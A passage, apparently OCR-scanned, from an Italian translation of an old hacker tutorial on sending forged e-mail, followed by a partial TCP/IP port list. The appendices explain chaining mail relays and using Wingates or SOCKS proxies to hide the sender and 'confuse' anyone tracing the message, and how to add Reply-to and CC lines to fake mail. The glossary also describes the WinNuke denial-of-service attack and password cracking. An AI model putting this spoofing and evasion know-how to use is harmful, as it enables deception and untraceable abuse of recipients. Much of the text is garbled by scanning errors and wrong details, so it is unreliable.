veloce, perciò è usato da programmi come Real Player per le trasmissioni video, dove la perdita di un 
singolo pacchetto(32) o due non è una grave preoccupazione. 


8. ICMP - sta per Internet Control Message Protocol. Un protocollo usato per trasferimento di errori 
tra networks (internet, networks locali, ecc..). 


9. IP address - ogni computer connesso a internet ha un indirizzo ip. Se un altro computer vuole 
interagire con il tuo computer ha bisogno del tuo IP, cosi come tu hai bisogno del numero di telefono 

di un'altra persona per chiamarla. 

L’indirizzo IP dovrebbe assomigliare a questo: x.x.x.x dove le x possono essere un numero tra 0 e 255. 
Nota: ci sono indirizzi IP ‘speciali’ che non sono usati per connettersi agli altri computer. 

Per esempio 127.0.0.1 significa localhost, ovvero significa te (il tuo computer). Connettendosi a 

una certa porta sull’indirizzo IP 121.0.0.1 ti connetterai su una porta del tuo computer. Oh, approposito, 
IP sta per Internet Protocol(18). 


10. Hostname - hey, indovina cosa!? Ho trovato questo sito davvero figo! Ma non posso ricordarmi il 
suo 

indirizzo IP, e quando lo faccio, odio digitare queste cose così lunghe! Certo, posso conservarlo, ma 
cosa 

vorrò dire ai miei amici su di esso? O cosa farò se sto navigando dal computer di un mio amico o di un 
posto 

pubblico e non ho lo ho con me? La risposta a tutte queste domande è l’hostname. 

Gli hostnames sono pseudonimi degli indirizzi IP. Una lista di hostnames e il loro indirizzo IP è situata 
in 

InterNIC, che è un database di tutti gli hostnames e il loro indirizzo IP. 

Quando digiti un hostname, il tuo computer cercherà quell’hostname e troverà l’appropriato indirizzo 
IPesi 

connetterà a esso. 

Ma invece di dover sovraccaricare InterNIC (Immagina che l’intero mondo si connetta ad esso. Questo 
sovraccaricherebbe sicuramente i loro servers e dovrebbero spendere soldi per costanti upgrades e 
backups. 

E pensa se accadesse qualcosa di male al loro database...). La soluzione per questo problema è 
chiamata DNS 

servers(17). 


11. Scoprire quali sono i server di posta del tuo ISP - ci sono diversi modi per farlo: 

1) Chiama il tuo ISP e chiedi l’indirizzo IP o l’hostname del server della posta in uscita (questo è il 
server 

di cui hai bisogno per fare tutti gli scherzi di questo tutorial). Se vuoi conoscere un server di posta di un 
ISP 

diverso dal tuo, chiama il loro numero di supporto tecnico. Ma come fare se sei dall’altra parte del 
mondo e non 

ti va di spendere tonnellate di soldi per chiamarli ed essere messo in attesa? In questo caso vai al punto 
3. 

2) Lancia il tuo client di posta, vai nel menu delle preferenze e cerca cosa è scritto nel campo 
‘outgoing 

mail’ o in ‘server SMTP” (sono la stessa cosa. SMTP sta per Simple Mail Transfer Protocol, che è un 
protocollo(18) 

che è usato per mandare e-mail attraverso internet). 

3) Indovinando! Se il tuo server bersaglio è someone.com, il loro mail server dovrebbe essere 
mail.someone.com:25 o someone.com:25. Se no, manda un e-mail a adlmin@someone.com o a 
support@someone.com 

e chiedi loro qual è il loro mail server (essi dovrebbero essere felici di risponderti, a meno che tu gli 
dici che sei un malefico hacker o qualcosa di simile. In quel caso chiameranno la polizia...). 

Nota: non tutti i server del mondo hanno un server per la posta in uscita! 


12. Portscanner - un programma che effettua lo scan di un bersaglio per trovare le porte aperte 
provandosi 

a connettersi su varie porte. Il più semplice portscanner incomincerà dalla porta 1 e continuerà, ma puoi 
impostare, sui più sofisticati portscanner, uno specifico range. 


13. Services scanner - uno scanner di servizi è molto più sofisticato di un portscanner poiché prova a 
connettersi su porte predefinite che dovrebbero avere un servizio che tu stai cercando. 


14. Root - un account su un computer Unix che ha i massimi privilegi permessi (legge, scrive (e 
cancella) 

e esegue ogni cosa e cambia i permessi delle altre persone). Nota: altri account possono avere accesso 
root, 

e l’account root potrebbe non sempre avere accesso root, dipende dal sysadmin(22) (ma root è 
l’account di 

default per l’accesso root). 


15. Bandwith - il totale ammontare della velocità di un dispositivo per la connessione a un network 
(un modem, una network card, un mail pigeon, ecc..) può averlo. Per esempio: ho appena comprato un 
nuovo modem. 

Ha un ampiezza di banda di 100Ks per secondo, ciò significa che può trasferire 100Ks per secondo. 
Quando usi il tuo dispositivo network per fare qualcosa, esso assorbirà un po’ di ampiezza di banda a 
seconda 

della sua operazione. 


16. Progamma client - un programma che si connette a certi servizi. La maggior parte dei client 
dovrebbero sapere 


come comunicare con quel servizio con o senza le informazioni che riceve dal daemon banner. 
Esempio: un internet browser (come Netscape) è un client poiché si connette alla porta 80, dove il 
webserver 

daemon sta aspettando per una connessione, e interagisce con esso per poter reperire il file che stai 
cercando. 

Un browser deve conoscere come comunicare con il webserver daemon (anche detto HTTPD, http 
daemon. http sta per 

Hyper Text Transfer Protocol) per poter pienamente accompiere alle tue richieste. 


17. DNS server - un server che conserva hostnames e i loro indirizzi IP. Invece di dover gestire i 
Servers 

InterNIC”s tutto il pianeta, ogni ISP ha un DNS server. 

Quando digiti un hostname e dici al tuo modem di connettersi a esso, il tuo computer eseguirà l’azione 
chiamata 

‘ DNS Lookup”. In altre parole, chiederà al DNS server del tuo ISP l’indirizzo IP appropriato per 
l’hostname che 

tu hai digitato. Se il server DNS del tuo ISP non sa la risposta, chiede a un server DNS di più alto 
livello. 

Se il server DNS di più alto livello non sa la risposta, chiederà a un server DNS di livello ancora 
maggiore, 

ecc... Il più alto livello è InterNIC stesso. 

Se il primo server DNS conosceva la risposta te l’avrebbe data la prima volta. Altrimenti (se l’avesse 
trovata 

dopo richieste ad altri server), prima l’avrebbe aggiunta al suo proprio database e poi te l'avrebbe data. 


18. Protocol - un insieme di regole usate dai computer per interagire tra di loro tramite un network di 
simili 

(come internet o alcuni network locali) essi hanno bisogno di conoscere un protocollo comune e ogni 
computer deve 

presupporre che gli altri lo conoscono e lo usano. 


19. Telnet - un programma che nella sua semplicità permette di formare una connessione basata sul 
testo tra il 

tuo computer e un altro computer attraverso un network di qualche sorta. Tu dovresti scegliere 
l’indirizzo IP 

o l’hostname e la porta con cui vuoi metterti in contatto, e telnet stabilirà una TCP connessione tra 
entrambe 

le macchine. 

Nota circa il Telnet daemon: il telnet daemon è completamente differente. Esso aspetta per connessioni 
TCP o 

UDP in arrivo sulla porta 23 e poi chiede l’user per il login (spesso chiamato username) e la password 
(a 

meno che l’user digita un username privo di password. In quel caso, ti loggherà senza richiedere la 
password. 

Account senza password sono davvero rari!) e poi procede a eseguire un programma (generalmente un 
interprete 

dei comandi(20)) e a darti alcuni permessi, tutto dipendente dallo username e dalla password che gli hai 
dato 


(a meno che tu abbia sbagliato. In quel caso, ti sarà detto che o l’username o la password sono sbagliati 
e 
ti sarà data un'altra possibilità. La maggior parte dei sistemi ti danno 3 possibilità e poi ti sganciano). 


20. Command Interpreter - un programma che accetta comandi da l’user e li trasforma in comandi reali 
che il 

computer capisce. 

Per esempio: se il tuo interprete contiene un comando chiamato, diciamo, ‘display’, che accetta un 
singolo 

parametro che dovrebbe essere un nome di un file, e tu digiti “display somefile’ (senza le virgolette, e 
sostituisci somefile con un file reale) esso tradurrà il comando in ‘okay Sig. Computer, trova il disco 
rigido 

facendo questo e questo, vai alla FAT (File Allocation Table) e trova in quale settore/settori questo file 
è 

contenuto, prendi il file e mandalo al dispositivo terminale (il dispositivo standard per l’output è il 
monitor). 

Questo rende l’idea? 


21. Shell account - un account su un computer remoto (un username, una password, e un gruppo di 
file di 

configurazione personale e cose varie). Avere uno shell account su un computer remoto significa avere 
la 

possibilità ti collegarsi via telnet ad esso sulla porta 23, digitare il login del tuo account (anche detto 
username) e la password e ottenendo un interprete dei comandi con alcuni permessi (a seconda del 
sysadmin)). 


22. Sysadmin/admin - l’uomo/donna/essere peloso che gestisce un sistema. 


23. Hyper Text - se hai mai visto un documento HTML dovresti sapere cos’è un iper testo, ma potresti 
non essere 

consapevole di ciò. HTML sta per Hyper Textual Markup Language. Iper testo è considerato come 
“un testo arricchito”, poiché puoi aggiungere figure, colori, links, ecc.. ad esso. Confronta quello con 
il testo regolare e noioso che usa questo tutorial... :D 


24. RFC - sta per Request For Comment. Questi sono schizzi di relazioni dell’ IETF (Internet 
Engeneering 

Task Force - quei ragazzi che impostano tutti quegli standards di internet e cose varie). Essi 
contengono 

suggerimenti per gli standards di internet. Puoi trovare gli RFCs su www.linuxberg.com . 


25. InterNIC - il database di registrazione domini e il server DNS di più alto livello sul pianeta. 


26. Sub domain - domini di prima classe appaiono così: something.com (o altre estensioni come org, 
net, 

it, co.uk, ecc..). Costa 70$ registrarne uno (vedi www.networksolution.com). Domini di seconda classe 
appaiono così: someone.something.com e costa 0$ registrarne uno, se hai something.com già registrato 
a te naturalmente (sebbene puoi procurartene gratis su siti come www.anrki.com). Domini di terza 
classe 


appaiono così: blah.someone.something.com e non costano nulla, ecc... 
Nota circa il prezzo dei domini di prima classe: questo prezzo non include il web hosting (qualcuno che 
ospiterà il tuo sito o qualunque cosa vuoi mettere sul loro server). 


27. SSH - sta per Secure Shell. Questo daemon aspetta per connessioni TCP o UDP in arrivo sulla porta 
22: 

Una volta che ti connetti, ti verranno chiesti un login e una password, proprio come il daemon telnet, 
solo che SSH encripta ogni cosa per aumentare la sicurezza. 


28. Moderated mailing list / mesage board - ti spiegherò questo dandoti un esempio. Bugtraq (vedi 
www.securityfocus.com) è una delle migliori mailing list legate alla sicurezza. Sebbene le persone 
possono “mandare cose alla lista” (significa mandare un messaggio e-mail e ottenere che venga 
mandato 

a tutti i membri della mailing list), tu non puoi proprio mandare ogni cosa. Aleph1, il moderatore, 
visiona tutti i messaggi inviati e spedisce solo quelli utili. 

Lo stesso avviene con le message boards moderate, ecc... 


29. DoS attack - DoS sta per Denial Of Service (anche detto “nuke” o “newk”). Un attacco DoS è 
ogni genere di attacco che causa il blocco di alcuni/tutti i servizi di un computer bersaglio. 

Per esempio: Winnuke (anche conosciuto come 00B), il più semplice DoS al mondo. 

(Preso dal sito dei DoS di Spikeman) Questo programma DoS colpisce i clients di windows mandando 
un messaggio d’eccezione “out of band” alla porta 139, che non conosce come affrontarlo. Questa 

è una porta standard di ingresso di windows. Utenti di win 3.11, win95 e win NT sono vulnerabili 

a questo attacco. Questo programma è principalmente un programma seccatore, ma sta circolando 
molto in internet adesso. E’ diventato una preoccupazione nelle chatrooms e su IRC. Usando il 

tuo indirizzo IP e inviando sulla porta 139 dati 0OB, utenti maliziosi possono disconnetterti dalla rete, 
spesso lasciandoti con poche risorse e lo schermo tinto di blu. Qualcuno di voi potrebbe già esserne 
stato 

vittima. Se questo avviene su win95, vedrai un errore fatale di windows simile al seguente: 

Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE. 

This was called from 0028: in VxD NDIS(01) + 00000D7C. 

Rebooting the comp should return it to normal state. 


Patches ("fixes") For WinNuke (00B) 

Informazioni addizionali su WinNuke 
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp 
Windows 95 Patches 
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe 
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*) 
http://www.theargon.com/defense/nuke/index.html 

Leggere le note riferite alle pacthes per il 95 prima di installarlo. 
Quale versione di Winsok hai installata sul tuo pc? 
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp 
http://www.theargon.com/defense/nuke/index.html 

Windows NT 4.0 Patch 
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp 
http://www.theargon.com/defense/nuke/index.html 


Leggere le note riferite alle pacthes per 1’ NT prima di installarlo. 


Maggiori informazioni sugli attacchi DoS possono essere trovati in: 
www.genocide2600.com/-spikeman/main.html 


* In realtà non so se questa patch lavorerà su una versione più nuova di Winsock. Perciò io vorrei 
raccomandarti 

di downgradarti prima alla versione 1.1 di Winsock (quella allegata a win95) andando nel pannello di 
controllo -> 

Network -> e rimovendo l’adattatore TCP/IP e Dial Up e poi ri-aggiungendolo clickando add -> scegli 
il protocollo 

e nello spazio delle compagnie scegli Microsoft. Poi cerca per un opzione chiamata TCP/IP e fai 
doppio click su di 

essa. Lo stesso per DUN (Dial Up Networking), fai lo stesso ma scegli adattatore invece di protocollo. 
Dopo che hai finito il downgrading ri-upgrada winsock 2.0, applica la patch (vipup20.exe) e poi 
upgrada alla nuova 

versione di winsock. 


30. DUN - sta per Dial Up Adapter. DUN è un programma allegato di windows e chiama il tuo ISP nel 
caso che hai un 
acount Dial-Up(31) 


31. Dial-Up account - un account dial-up presso un ISP significa che il tuo modem deve chiamare 
alcuni numeri 

prima che tu possa accedere alla rete. A differenza degli altri account ISP (cavi diretti che ti tengono 
online 

24 ore su 24), tu hai un indirizzo IP dinamico (e non statico come una connessione diretta via cavo) 
poiché tu 

ti devi connettere e disconnettere invece di stare online tutto il tempo. Ogni volta che ti riconnetti ti 
viene 

assegnato un differente indirizzo IP. 


32. Packet - un pezzo di dati che viaggia attraverso un network (come internet o un network locale o 
esteso). 

Un pacchetto è costituito da due parti principali: l’header e i dati stessi. L’header contiene tutti i tipi di 
ingegnosi valori come il TTL (Time To Live) e oltre (puoi leggere argomenti collegati nella sezione 
‘Modem Speedup” a blacksun.box.sk). La parte dei dati contiene i dati attuali che il pacchetto sta 
trasportando. 

Su un regolare acount dial-up, la grandezza di un pacchetto dovrebbe essere 576 bytes (incluso 
l’header), 

ma su una connessione diretta via cavo dovrebbe essere molto più grande (guarda ancora la sezione 
‘Modem Speedup” a blacksun.box.sk). 


33. Unix password file - ogni sistema unix ha un file di password. Esso contiene una lista di user, le 
loro 

password e alcuni importanti informazioni su di loro. Il file di password è situato in etc/passwd. Ogni 
linea 

rappresenta un utente. Ogni linea è costituita da 7 campi, separati dal segno ‘ : ‘. 


Una linea di un file di password dovrebbe apparire come questa: 

username:password criptata:UID:GID:breve descrizione:home directory:shell 

Username: l’username dell’utente 

Password criptata: la password dell’utente (criptata per maggiore sicurezza). Una password criptata in 
genere 

è lunga 13 caratteri. 

UID - User ID: ogni utente ha un numero ID. Se il tuo UID è 0 significa che hai accesso root. 

GDI - Group ID: puoi impostare un gruppo (per esempio: tutte le persone che lavorano nella divisione 
contabilità) 

e impostare permessi speciali per quell’intero gruppo. Il root ha GID 0. 

Breve descrizione: breve descrizione dell’utente in linguaggio umano. 

Home directory: il directory dove sono contenuti tutti i files di configurazione personale dell’utente. 
Shell: un programma che è eseguito una volta che l’utente è collegato. Nella maggior parte dei casi (e 
in questo caso anche) lo shell è un interprete di comandi. 

Se il campo della password criptata è vuoto, significa che l’utente può loggarsi semplicemente 
immettendo 

solo l’username. Questo può essere cambiato dopo esserci loggati digitando ‘passwd’ all’interprete dei 
comandi. 

Ti sarà chiesto di impostare una password per il tuo account. 

Nota: su alcuni sistemi, devi digitare passwd tuo-username invece di digitare solo passwd. 

Nota 2: il root può fare passwd tuo-username e cambiare la password del tuo username, non importa 
qual è il 

tuo username. 

Nota 3: se tu digiti un qualsiasi carattere che non sia uno dei seguenti “. / 0-9 a-z A-Z” (senza le 
virgolette) 

o se non digiti nulla, l’account è disabilitato così che l’utente non può loggarsi. 

Questo è usato quando sai che potresti voler abilitare l’account in futuro. 


Crackare le password criptate 

‘ororore rete rete ro ro ro ro rerece 

Per questo hai bisogno di un password cracker. Un password cracker è un programma che estrae una 
parola da 

un file dizionario (anche chiamato ‘wordlist’) o da una combinazione di lettere, numeri, ecc.., il 
programma 

la encripta sistematicamente (‘brute force cracking’), nel modo delle password criptate di unix e poi la 
compara alle passwords date in un file di password. Se le password combaciano, annuncia la password 
corretta 

per quell’username. 


34. Trhead - adesso sto parlando dei threads nelle liste di discussione e nelle bacheche di messaggi, non 
sui programmi dei computer. Discuteremo di quelli in un'altra occasione (forse). Un thread è una serie 
di 

messaggi che parte da un singolo messaggio. Lasciatemi mostrare: una persona inizia un thread 
esprimendo 

un fatto o un opinione. Poi, un'altra persona va nella lista di discussione o nella bacheca di messaggi e 
esprime la sua opinione su quel soggetto. Poi un'altra persona replica all’opinione della seconda 
persona. 

Poi un altro viene, ma decide di replicare al messaggio originale poiché non ha nulla da dire sugli altri 


messaggi (se si, può spedire due messaggi). Hai afferrato l’idea... 


Appendice A: falsi daemons 


Trovai questi due falsi daemon (sendmail e telnet) presso packetstorm.security.com una volta. Questi 
sono 

fantastici per ingannare gli attaccanti e per giocare scherzi ai tuoi amici. 

Questi sono programmi Perl (un linguaggio di programmazione). 

Per eseguirli su un sistema unix , digita semplicemente ./nomefile e rimpiazza nomefile con il nome del 
file che vuoi eseguire. Ogni distribuzione unix contiene perl (Penso. Correggetemi se sbaglio: 
barakirs@netvision.net.il). 

Per eseguirli sotto dos/windows devi scaricare active perl da www.activeperl.com e poi semplicemente 
fare doppio click su di essi. 

Non so come eseguirli sotto un mac. Penso che active perl supporta il mac, ma non sono sicuro. 
Adesso sui falsi daemons. 

Ci sono due daemon contenuti in un unico pacchetto con un file readme. Di seguito ci sono tutti e 

tre i file. Non li ho alterati, è tutto per te. Gioca con loro e impara. Oh , approposito, , se vuoi 

imparare il perl (o ogni altro linguaggio di programmazione), vai a blacksun.box.sk e cerca la sezione 
‘book. 

Divertitevi! 


Appendice B: Routing Mail 


Puoi far andare la tua posta lungo molti differenti servers per rendere l’header più lungo e confondere 
le persone che vogliono scovarti. 

Esempio: se vuoi mandare una e-mail fasulla a blah@blah.com, e farla viaggiare lungo blaha.com, 
blahb.com 

e blahc.com, allora nella parte rcpt:, fai semplicemente questo: 
@blaha.com,@blahb.com,@blahc.com:blah@blah.com 

Nota: questo non lavora con ogni daemon sendmail. 

Grazie a Magnus Kristiansens per questo! ;-) 


Appendice C: nascondere il tuo IP 


Così non vuoi che le persone trovino il tuo IP e il tuo hostname quando li cercano nell’header 
completo? 

Allora semplicemente nascondi il tuo IP! 

Puoi farlo usando Wingates o SOCKS firewalls, o collegandoti con telnet al daemon sendmail da uno 
shell 

account. Se usi uno di questi, il full header mostrerà l’IP del Wingate/SOCKS firewall/provider dello 
shell. Se trovi uno shell acount che ti permette di collegarti con telnet al suo esterno, puoi usare 

ciò per falsificare il tuo IP. Altrimenti, usa wingates o SOCKS firewalls. Per imparare di più leggi i 
tutorial su Proxy/Wingate/SOCKS e il nostro tutorial sull’anonimato a blacksun.box.sk. 

Noi raccomandiamo anche di andare alla sezione ‘books’ sul nostro sito e scaricare l’eccellente 
manuale 

chiamato ‘IP spoofing Demystified’. Le cose scritte potrebbero non essere così pratiche, ma è molto 
importante leggerlo (imparerai un sacco di cose importanti che potrai usare in seguito). 


Appendice D: Reply-to 


L’opzione reply-to fa il seguente: quando una persona riceve un e-mail con un indirizzo replay-to e 
manda una risposta, la risposta è mandata all’indirizzo specificato dentro il comando replay-to 
(questo non funziona sui clients di posta davvero davvero vecchi). Per usarlo semplicemente 
inserisci questa linea: 

Replay-to: some-user@some-server.net 

e rimpiazza some-user e some-server con gli appropriati utente e server. Devi includere questa 
linea prima o dopo la parte “subject:”. 


Appendice E: CC e BCC 


CC è usato per mandare messaggi a altre persone che non sono I riceventi del messaggio, ma 
potrebbero avere bisogno delle informazioni in esso. 

BCC è usato allo stesso modo, solo le persone possono vedere Il destinatario. 

La B in BCC sta per Blind, mentre le CC stanno per Carbon Copy (come quando copi una pagina 
usando...indovina). Così BCC sta per Blind Carbon Copy mentre CC sta per Carbon Copy. Eccitante, 
non è vero? Grazie a 12tb per questa informazione. 

Vuoi usare CC e BCC nelle tue e-mail false? Nessun problema! 

Essi lavorano esattamente come il comando Reply-to. Semplicemente mettendo linee CC: o BCC: 
nella tua e-mail falsa (nel corpo del messaggio), e poi inserendo l’appropriato indirizzo e-mail. 


Consultazioni 


REC 821 - the SMTP REC. Possono essere trovati presso freesoft.org/CIE/RFC/821/index.htm . 
Grazie a Chris Karwoski per questo ;-) 


Questa guida è stata scritta da Raven e tradotta dal M3xican ( m3xican@napolihak.cjb.net ), 
se considerate la traduzione scadente o vi volete cimentare nell’impresa potete scaricare la versione 
originale in americano sempre su http://napolihak.cjb.net. 


TCP/IP Port Numbers 


WELL KNOWN PORT NUMBERS 


<Source:Notes> <Author> 
If you don't find what you were expecting or hoping for please provide <Comments or additions> 
Italics indicates that a protocol is rare or non-existant. 


e O/tcp Reserved 

e 0/udp Reserved 

e tcpmux l/tcp TCP Port Service Multiplexer 
e compressnet 2/tcp Management Utility 
e compressnet 3/tcp Compression Process 
e rje S/tcp Remote Job Entry 

e echo 7/tcp Echo 

e echo 7/udp Echo 

e discard 9/tcp Discard 

e discard 9/udp Discard 

e systat 11/tcp Active Users 

e daytime 13/tcp Daytime 

e daytime 13/udp Daytime 

e gotd 17/tcp Quote of the Day 

e qotd 17/udp Quote of the Day 

e rwrite 18/tcp RWP rwrite 

e rwrite 18/udp RWP rwrite 

e msp 18/tcp Message Send Protocol 

e msp 18/udp Message Send Protocol 

e chargen 19/tcp Character Generator 

e chargen 19/udp Character Generator 

e ftp-data 20/tcp File Transfer [Default Data] 
e ftp 21/tcp File Transfer [Control] 

e telnet 23/tcp Telnet 

e 24/tcp any private mail system 

e 24/udp any private mail system 

e smtp 25/tcp Simple Mail Transfer 
nsw-fe 27/tcp NSW User System FE 
nsw-fe 27/udp NSW User System FE 
msg-icp 29/tcp MSG ICP 

msg-icp 29/udp MSG ICP 

msg-auth 31/tcp MSG Authentication 
msg-auth 31/udp MSG Authentication 
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dsp 33/tcp Display Support Protocol 
dsp 33/udp Display Support Protocol 
35/tcp any private printer server 
35/udp any private printer server 
time 37/tcp Time 


e time 37/udp Time 

e rap 38/tcp Route Access Protocol 

e rap 38/udp Route Access Protocol 

e rlp 39/udp Resource Location Protocol 

e graphics 41/tcp Graphics 

e graphics 41/udp Graphics 

e nameserver 42/udp Host Name Server 

e nicname 43/tcp Who Is 

e mpm-flags 44/tcp MPM FLAGS Protocol 

e mpm 45/tcp Message Processing Module [recv] 
e mpm-snd 46/tcp MPM [default send] 

e ni-ftp 47/tcp NI FTP 

ni-ftp 47/udp NI FTP 

auditd 48/tcp Digital Audit Daemon 

auditd 48/udp Digital Audit Daemon 

login 49/tcp Login Host Protocol 

e re-mail-ck 50/tcp Remote Mail Checking Protocol 
e re-mail-ck 50/udp Remote Mail Checking Protocol 
e la-maint 51/udp IMP Logical Address Maintenance 
e xns-time 52/tcp XNS Time Protocol 

e xns-time 52/udp XNS Time Protocol 

e domain 53/tcp Domain Name Server 

e domain 53/udp Domain Name Server 

e xns-ch 54/tcp XNS Clearinghouse 

e xns-ch 54/udp XNS Clearinghouse 

e isi-gl 55/tcp ISI Graphics Language 

e isi-gl 55/udp ISI Graphics Language 

e xns-auth 56/tcp XNS Authentication 

e xns-auth 56/udp XNS Authentication 

e 57/tcp any private terminal access 

e 57/udp any private terminal access 

e xns-mail 58/tcp XNS Mail 

e xns-mail 58/udp XNS Mail 

59/tcp any private file service 

59/udp any private file service 

60/tcp Unassigned 

60/udp Unassigned 

ni-mail 61/tcp NI MAIL 
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ni-mail 61/udp NI MAIL 

acas 62/tcp ACA Services 

covia 64/tcp Communications Integrator (CI) 
tacacs-ds 65/tcp TACACS-Database Service 
sql*net 66/tcp Oracle SQL*NET 

bootps 67/udp Bootstrap Protocol Server 
bootpc 68/udp Bootstrap Protocol Client 
tftp 69/udp Trivial File Transfer 

gopher 70/tcp Gopher 

netrjs-1 71/tcp Remote Job Service 

netrjs-1 71/udp Remote Job Service 

netrjs-2 72/tcp Remote Job Service 

netrjs-2 72/udp Remote Job Service 

netrjs-3 73/tcp Remote Job Service 

netrjs-3 73/udp Remote Job Service 

netrjs-4 74/tcp Remote Job Service 

netrjs-4 74/udp Remote Job Service 

75/tcp any private dial out service 

75/udp any private dial out service 

deos 76/tcp Distributed External Object Store 
deos 76/udp Distributed External Object Store 
7T7/tcp any private RJE service 

77/udp any private RJE service 

vettcp 78/tcp vettcp 

vettcp 78/udp vettcp 

http 80/tcp World Wide Web HTTP 
www-http 80/tcp World Wide Web HTTP 
hosts2-ns 81/tcp HOSTS2 Name Server 
hosts2-ns 81/udp HOSTS2 Name Server 
xfer 82/tcp XFER Utility 

xfer 82/udp XFER Utility 

mit-ml-dev 83/tcp MIT ML Device 
mit-ml-dev 83/udp MIT ML Device 

ctf 84/tcp Common Trace Facility 

ctf 84/udp Common Trace Facility 
mit-ml-dev 85/tcp MIT ML Device 
mit-ml-dev 85/udp MIT ML Device 
mfcobol 86/tcp Micro Focus Cobol 

87/tcp any private terminal link 

87/udp any private terminal link 

kerberos 88/tcp Kerberos 

su-mit-tg 89/tcp SU/MIT Telnet Gateway 
dnsix 90/tcp DNSIX Securit Attribute Token Map 
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mit-dov 91/tcp MIT Dover Spooler 

npp 92/tcp Network Printing Protocol 

npp 92/udp Network Printing Protocol 

dcp 93/tcp Device Control Protocol 

dep 93/udp Device Control Protocol 

objcall 94/tcp Tivoli Object Dispatcher 

e objcall 94/udp Tivoli Object Dispatcher 

supdup 95/tcp SUPDUP 

supdup 95/udp SUPDUP 

e dixie 96/tcp DIXIE Protocol Specification 

swift-rvf 97/tcp Swift Remote Virtural File Protocol 
swift-rvf 97/udp Swift Remote Virtural File Protocol 
tacnews 98/tcp TAC News 

tacnews 98/udp TAC News 

metagram 99/tcp Metagram Relay 

metagram 99/udp Metagram Relay 

newacct 100/tcp [unauthorized use] 

hostname 101/tcp NIC Host Name Server 

hostname 101/udp NIC Host Name Server 

iso-tsap 102/tcp ISO-TSAP Class 0 

iso-tsap 102/udp ISO-TSAP Class 0 

gppitnp 103/tcp Genesis Point-to-Point Trans Net 
gppitnp 103/udp Genesis Point-to-Point Trans Net 
acr-nema 104/tcp ACR-NEMA Digital Imag. & Comm. 300 
csnet-ns 105/tcp Mailbox Name Nameserver 
csnet-ns 105/udp Mailbox Name Nameserver 
3com-tsmux 106/tcp 3C0M-TSMUX 

3com-tsmux 106/udp 3COM-TSMUX 

poppassd 106/tcp Password Server 

rtelnet 107/tcp Remote Telnet Service 


e snagas 108/tcp SNA Gateway Access Server 
e pop2 109/tcp Post Office Protocol - Version 2 
e pop3 110/tcp Post Office Protocol - Version 3 
e sunrpc 111/tcp SUN Remote Procedure Call 
e sunrpc 111/udp SUN Remote Procedure Call 
e mcidas 112/tcp McIDAS Data Transmission Protocol 
e auth 113/tcp Authentication Service 

e audionews 114/tcp Audio News Multicast 

e audionews 114/udp Audio News Multicast 

e sftp 115/tcp Simple File Transfer Protocol 
sftp 115/udp Simple File Transfer Protocol 
ansanotify 116/tcp ANSA REX Notify 
ansanotify 116/udp ANSA REX Notify 
uucp-path 117/tcp UUCP Path Service 
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sqlserv 118/tcp SQL Services 
sqlserv 118/udp SQL Services 


e nntp 119/tcp Network News Transfer Protocol 


cfdptkt 120/tcp CFDPTKT 

cfdptkt 120/udp CFDPTKT 

erpe 121/tcp Encore Expedited Remote Pro.Call 
erpe 121/udp Encore Expedited Remote Pro.Call 
smakynet 122/tcp SMAKYNET 

smakynet 122/udp SMAKYNET 

ntp 123/tcp Network Time Protocol 

ntp 123/udp Network Time Protocol 

ansatrader 124/tcp ANSA REX Trader 
ansatrader 124/udp ANSA REX Trader 
locus-map 125/tcp Locus PC-Interface Net Map Ser 


e unitary 126/tcp Unisys Unitary Login 


unitary 126/udp Unisys Unitary Login 

locus-con 127/tcp Locus PC-Interface Conn Server 
gss-xlicen 128/tcp GSS X License Verification 
gss-xlicen 128/udp GSS X License Verification 
pwdgen 129/tcp Password Generator Protocol 
pwdgen 129/udp Password Generator Protocol 
cisco-fna 130/tcp cisco FNATIVE 

cisco-fna 130/udp cisco FNATIVE 

cisco-tna 131/tcp cisco TNATIVE 

cisco-tna 131/udp cisco TNATIVE 

cisco-sys 132/tcp cisco SYSMAINT 

cisco-sys 132/udp cisco SYSMAINT 

statsrv 133/tcp Statistics Service 

statsrv 133/udp Statistics Service 

ingres-net 134/tcp INGRES-NET Service 

loc-srv 135/tcp Location Service 

loc-srv 135/udp Location Service 

profile 136/tcp PROFILE Naming System 
netbios-ns 137/tcp NETBIOS Name Service 
netbios-ns 137/udp NETBIOS Name Service 
netbios-dgm 138/tcp NETBIOS Datagram Service 
netbios-dgm 138/udp NETBIOS Datagram Service 
netbios-ssn 139/tcp NETBIOS Session Service 
netbios-ssn 139/udp NETBIOS Session Service 
emfis-data 140/tcp EMFIS Data Service 
emfis-data 140/udp EMFIS Data Service 
emfis-cntl 141/tcp EMFIS Control Service 
emfis-cntl 141/udp EMFIS Control Service 
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e bl-idm 142/tcp Britton-Lee IDM 

e bl-idm 142/udp Britton-Lee IDM 

e imap2 143/tcp Interactive Mail Access Protocol v2 
news 144/tcp NewS 

news 144/udp NewS 

uaac 145/tcp UAAC Protocol 

uaac 145/udp UAAC Protocol 

iso-tp0 146/tcp ISO-IPO 

iso-tp0 146/udp ISO-IPO 

iso-1p 147/tcp ISO-IP 

iso-1p 147/udp ISO-IP 

cronus 148/tcp CRONUS-SUPPORT 

cronus 148/udp CRONUS-SUPPORT 

aed-512 149/tcp AED 512 Emulation Service 
aed-512 149/udp AED 512 Emulation Service 
sql-net 150/tcp SQL-NET 

sql-net 150/udp SQL-NET 

hems 151/tcp HEMS 

bftp 152/tcp Background File Transfer Program 


bftp 152/udp Background File Transfer Program 

semp 153/tcp SGMP 

semp 153/udp SGMP 

netsc-prod 154/tcp NETSC 

netsc-prod 154/udp NETSC 

netsc-dev 155/tcp NETSC 

netsc-dev 155/udp NETSC 

sqlsrv 156/tcp SQL Service 

knet-cmp 157/tcp KNET/VM Command/Message Protocol 


pemail-srv 158/tcp PCMail Server 
nss-routing 159/tcp NSS-Routing 
nss-routing 159/udp NSS-Routing 
sgmp-traps 160/tcp SGMP-TRAPS 
sgmp-traps 160/udp SGMP-TRAPS 
snmp 161/udp SNMP 

snmptrap 162/udp SNMPTRAP 
cmip-man 163/tcp CMIP/TCP Manager 
cmip-man 163/udp CMIP/TCP Manager 
cmip-agent 164/tcp CMIP/TCP Agent 
smip-agent 164/udp CMIP/TCP Agent 
xns-courier 165/tcp Xerox 


xns-courier 165/udp Xerox 


s-net 166/tcp Sirius Systems 
s-net 166/udp Sirius Systems 
